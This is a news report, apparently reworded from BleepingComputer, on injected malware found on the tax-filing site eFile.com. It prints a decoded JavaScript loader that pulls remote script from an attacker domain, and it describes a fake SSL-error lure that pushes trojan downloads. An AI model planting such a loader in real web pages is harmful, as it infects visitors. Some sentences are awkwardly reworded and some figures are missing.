eFile.com, an IRS-licensed electronic file software service provider used by many people to file their tax returns, was caught distributing JavaScript malware.

Security researchers claim that the malicious JavaScript file existed on the eFile.com website for weeks. BleepingComputer was able to confirm the existence of the malicious JavaScript file in question, at the time.

Please note that this security incident specifically concerns eFile.com and not identical sound domains or IRS Electronic File Infrastructure.

Just in time for tax season

eFile.com has been caught serving malware, as several users and researchers have spotted it. The malicious JavaScript file in question is called ‘popper.js’:

The development comes at a crucial time when US taxpayers are completing their IRS tax returns ahead of the April 18 due date.

The code highlighted above is base64 encoded with its decoded version shown below. The code attempts to load the JavaScript returned by infoamanewonliag[.]on line:

s=document.createElement(‘script’);document.body.appendChild(s);
s.src=”https://www.infoamanewonliag[.]online/update/index.php?”+Math.random();

Using Math.random() at the end is likely to prevent caching and load a fresh copy of the malware – if the threat author makes changes to it, each time eFile.com is visit. At the time of writing, the endpoint was no longer operational.

BleepingComputer can confirm that the malicious JavaScript file “popper.js” was loaded by almost all pages of eFile.com, at least until April 1st.

As of today, the file no longer serves malicious code.

Site “hacked” more than 2 weeks ago

On March 17, a Reddit thread surfaced where several eFile.com users suspected that the website had been “hacked”.

At the time, the website displayed an SSL error message that some claimed appeared to be fake:

It turns out that is indeed the case. Researchers spotted an additional “update.js” file associated with this attack that was served by an Amazon AWS endpoint.

BleepingComputer got the so called ‘update.js’ and we noticed the fake SSL error message present as base64 encoded HTML (highlighted below) inside:

An HTML snippet of the decoded string generating the fake SSL error is shown below:

The malicious JavaScript file “update.js” further attempts to prompt users to download the next step payload, depending on whether they are using Chrome or not. [update.exe – VirusTotal] or Firefox [installer.exe – VirusTotal]. Some antivirus products have already started reporting these executables as Trojans.

BleepingComputer has independently confirmed that these binaries establish a connection to a Tokyo-based IP address, 47.245.6.91, which appears to be hosted at Alibaba. The same IP address also hosts the illicit domain, infoamanewonliag[.]on line associated with this problem.

A security research group named MalwareHunterTeam, who then analyzed these binaries, States these contain Windows botnets written in PHP, a fact the research group mocked. Additionally, they called out eFile.com for leaving the malicious code on its website for weeks:

“So the website of [efile.com]…was compromised at least around mid-March and still hasn’t been cleaned up,” writing MalwareHunterTeam.

Referring to a Reddit thread, they further stated, “…even the area serving the payloads was already mentioned 15 days ago. How has this not gotten more attention yet ?”

Dr. Johannes Ulrich of the SANS Institute has also published analysis of the problem.

The extent of this incident, including whether the attack succeeded in infecting eFile.com visitors and customers, remains to be determined.

BleepingComputer approached eFile.com with questions long before publication.

In January 2022, the LockBit ransomware gang claimed he attacked eFile.com. At the time, BleepingComputer did not receive a response from the company confirming or denying an attack.